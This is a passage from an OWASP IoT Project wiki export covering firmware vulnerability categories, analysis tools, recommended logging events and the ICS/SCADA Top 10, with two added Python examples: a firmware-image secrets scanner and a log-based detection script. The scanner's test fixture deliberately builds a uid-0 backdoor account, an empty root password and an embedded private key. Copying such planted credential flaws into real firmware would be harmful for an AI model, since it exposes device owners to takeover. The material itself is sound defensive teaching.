* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
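A first pass over an extracted root filesystem for the ''Device Firmware Vulnerabilities'' listed above (hardcoded credentials, backdoor accounts, encryption key exposure, the same certificate on multiple devices, sensitive URL disclosure), and for the kind of material the ''Firmware and storage extraction'' row of the IoT vulnerabilities table says a dump contains. This is an added Python example in the spirit of Firmwalker, not Firmwalker's or the OWASP project's code; the sample rootfs it builds, the file names and the cloud endpoint are all constructed for the example.<br />

```python
"""Triage of an extracted firmware root filesystem: hard-coded or empty
credentials, extra uid 0 accounts, embedded private keys, certificates shared
across images, and URLs that leak internal endpoints.  Added example, not the
firmwalker or OWASP project code.  Certificate expiry is not checked here; that
needs an X.509 parser (e.g. `openssl x509 -noout -dates`)."""
import hashlib
import os
import re
import tempfile

PRIVATE_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
CERT_RE = re.compile(rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)
URL_RE = re.compile(rb"https?://[A-Za-z0-9._:/?&=%-]+")
# crypt(3) hash formats: $1$ md5, $2a/b/y$ bcrypt, $5$/$6$ sha-crypt, or 13-char DES.
HASH_RE = re.compile(r"^\$(?:1|2[aby]|5|6)\$|^[A-Za-z0-9./]{13}$")


def scan_accounts(root):
    """Inspect etc/passwd and etc/shadow for shipped credentials and backdoors."""
    report = {"hardcoded_credentials": [], "passwordless_accounts": [], "backdoor_accounts": []}
    for rel in ("etc/passwd", "etc/shadow"):
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                fields = line.rstrip("\n").split(":")
                if len(fields) < 2:
                    continue
                user, secret = fields[0], fields[1]
                if secret == "":                       # no password at all
                    report["passwordless_accounts"].append((rel, user))
                elif HASH_RE.match(secret):            # a real hash: same on every device
                    report["hardcoded_credentials"].append((rel, user))
                # passwd field 3 is the uid; a second uid 0 account is a classic backdoor
                if rel == "etc/passwd" and len(fields) > 2 and fields[2] == "0" and user != "root":
                    report["backdoor_accounts"].append(user)
    return report


def scan_files(root):
    """Walk the image for private keys, certificates and embedded URLs."""
    found = {"private_keys": [], "cert_fingerprints": {}, "urls": set()}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)            # first MiB covers text configs
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            if PRIVATE_KEY_RE.search(data):
                found["private_keys"].append(rel)
            for m in CERT_RE.finditer(data):           # hash of the PEM body identifies the cert
                fp = hashlib.sha256(m.group(1)).hexdigest()[:16]
                found["cert_fingerprints"].setdefault(fp, []).append(rel)
            found["urls"].update(u.decode() for u in URL_RE.findall(data))
    return found


def triage(root):
    """Combined report for one extracted image."""
    report = scan_accounts(root)
    files = scan_files(root)
    report["private_keys"] = sorted(files["private_keys"])
    report["urls"] = sorted(files["urls"])
    return report


def shared_certificates(*image_roots):
    """Fingerprints that occur in more than one image (same cert on many devices)."""
    seen = {}
    for root in image_roots:
        for fp in scan_files(root)["cert_fingerprints"]:
            seen.setdefault(fp, set()).add(root)
    return sorted(fp for fp, roots in seen.items() if len(roots) > 1)


FAKE_CERT = b"-----BEGIN CERTIFICATE-----\nMIIBconstructedNotARealCert==\n-----END CERTIFICATE-----\n"


def build_sample_rootfs(base):
    """Constructed fixture: a tiny rootfs exhibiting each defect the scanner reports."""
    os.makedirs(os.path.join(base, "etc", "ssl"), exist_ok=True)
    with open(os.path.join(base, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/sh\n"
                 "support:$1$abc$Qh4constructedHashXXXXX:0:0::/:/bin/sh\n")   # hash + uid 0
    with open(os.path.join(base, "etc", "shadow"), "w") as fh:
        fh.write("root::0:0:99999:7:::\n")                                    # empty hash
    with open(os.path.join(base, "etc", "ssl", "device.key"), "wb") as fh:
        fh.write(b"-----BEGIN RSA PRIVATE KEY-----\nconstructed\n-----END RSA PRIVATE KEY-----\n")
    with open(os.path.join(base, "etc", "ssl", "device.crt"), "wb") as fh:
        fh.write(FAKE_CERT)
    with open(os.path.join(base, "etc", "cloud.conf"), "w") as fh:
        fh.write("endpoint=https://api.example.invalid/v1/debug\n")


def demo():
    """Two constructed images that ship the same certificate; triage one, compare both."""
    image_a, image_b = tempfile.mkdtemp(), tempfile.mkdtemp()
    build_sample_rootfs(image_a)
    build_sample_rootfs(image_b)
    return triage(image_a), shared_certificates(image_a, image_b)


if __name__ == "__main__":
    print(demo())
```

Point it at the directory binwalk or the Firmware Modification Kit extracted (the squashfs or jffs2 root) instead of the constructed fixture; comparing two firmware versions, or the images of two product lines, with shared_certificates is the quickest way to confirm the "same certificate used on multiple devices" finding.<br />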
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
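Detection rules for several of the event categories above (''Multiple Failed Passwords'', ''High Rate of Login Attempts'', ''Device Accessed Using Default Administrative Credentials'', ''Source Location Changes During Session'', ''Attempt to Invoke Unsupported HTTP Method'', ''Traffic Seen from Unenrolled System''), run over a handful of device log lines. This is an added Python example, not code from the OWASP project or from AppSensor; the log format, thresholds, enrolment list and the sample lines are constructed for the example.<br />

```python
"""Detection logic for several of the event categories in the table above,
run over constructed device log lines.  Added example, not OWASP project
code.  The log format (ISO timestamp followed by key=value pairs) and the
thresholds are assumptions for the example, not a format any product emits."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

ALLOWED_METHODS = {"GET", "POST"}            # what this device's web UI serves
ENROLLED_DEVICES = {"dev-001", "dev-002"}    # constructed ecosystem membership list
FAIL_THRESHOLD = 3                           # Multiple Failed Passwords
RATE_THRESHOLD, RATE_WINDOW = 5, timedelta(seconds=60)   # High Rate of Login Attempts

# Constructed sample: a brute-force run that ends in a login with the factory
# password, a session that hops source address, an odd HTTP method and traffic
# from a device that was never enrolled.
SAMPLE_LOG = """\
2019-11-01T07:00:00 event=login result=fail user=admin src=203.0.113.7 session=-
2019-11-01T07:00:05 event=login result=fail user=admin src=203.0.113.7 session=-
2019-11-01T07:00:09 event=login result=fail user=admin src=203.0.113.7 session=-
2019-11-01T07:00:12 event=login result=fail user=admin src=203.0.113.7 session=-
2019-11-01T07:00:15 event=login result=ok user=admin src=203.0.113.7 session=s1 cred=default
2019-11-01T07:01:00 event=http method=GET path=/status src=203.0.113.7 session=s1
2019-11-01T07:01:30 event=http method=TRACE path=/status src=198.51.100.9 session=s1
2019-11-01T07:02:00 event=peer device=dev-009 src=192.0.2.44 session=-
"""


def parse(line):
    """'<iso-ts> k=v k=v ...' -> dict with a datetime under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.fromisoformat(ts)
    return fields


def detect(lines):
    """Return [(event name, subject), ...] in the order the evidence completes."""
    events = sorted((parse(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    alerts = []
    fails = Counter()                   # user -> failed password count
    attempts = defaultdict(list)        # src -> login timestamps inside RATE_WINDOW
    session_sources = defaultdict(set)  # session id -> source addresses seen
    for e in events:
        if e.get("event") == "login":
            src = e["src"]
            attempts[src] = [t for t in attempts[src] if e["ts"] - t <= RATE_WINDOW] + [e["ts"]]
            if len(attempts[src]) == RATE_THRESHOLD:      # fire once when the window fills
                alerts.append(("High Rate of Login Attempts", src))
            if e["result"] == "fail":
                fails[e["user"]] += 1
                if fails[e["user"]] == FAIL_THRESHOLD:
                    alerts.append(("Multiple Failed Passwords", e["user"]))
            elif e.get("cred") == "default":
                # The device knows its factory password, so it can flag a login that used it.
                alerts.append(("Device Accessed Using Default Administrative Credentials", e["user"]))
        if e.get("session", "-") != "-":
            session_sources[e["session"]].add(e["src"])
            if len(session_sources[e["session"]]) == 2:
                alerts.append(("Source Location Changes During Session", e["session"]))
        if e.get("event") == "http" and e["method"] not in ALLOWED_METHODS:
            alerts.append(("Attempt to Invoke Unsupported HTTP Method", e["method"]))
        if e.get("event") == "peer" and e["device"] not in ENROLLED_DEVICES:
            alerts.append(("Traffic Seen from Unenrolled System", e["device"]))
    return alerts


if __name__ == "__main__":
    for name, subject in detect(SAMPLE_LOG.splitlines()):
        print("%-60s %s" % (name, subject))
```

The rules only work because the device logs the fields they key on: a login line without the source address cannot feed the rate or session rules, and the default-credential event can only be produced on the device, since nothing downstream ever sees the password. That is the practical argument of this project: decide the events first, then make sure each log line carries the fields the detection needs.<br />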
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program, and for companies that want to build one there are few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon. For information on how to get started with contributing, see the "Project Task List" in the download section. <br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* Paulino Calderon<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 member organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248643OWASP Internet of Things Project2019-03-12T03:22:36Z<p>Aaron.guzman: /* What is the ICS/SCADA Project? */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release''': release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Lévy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
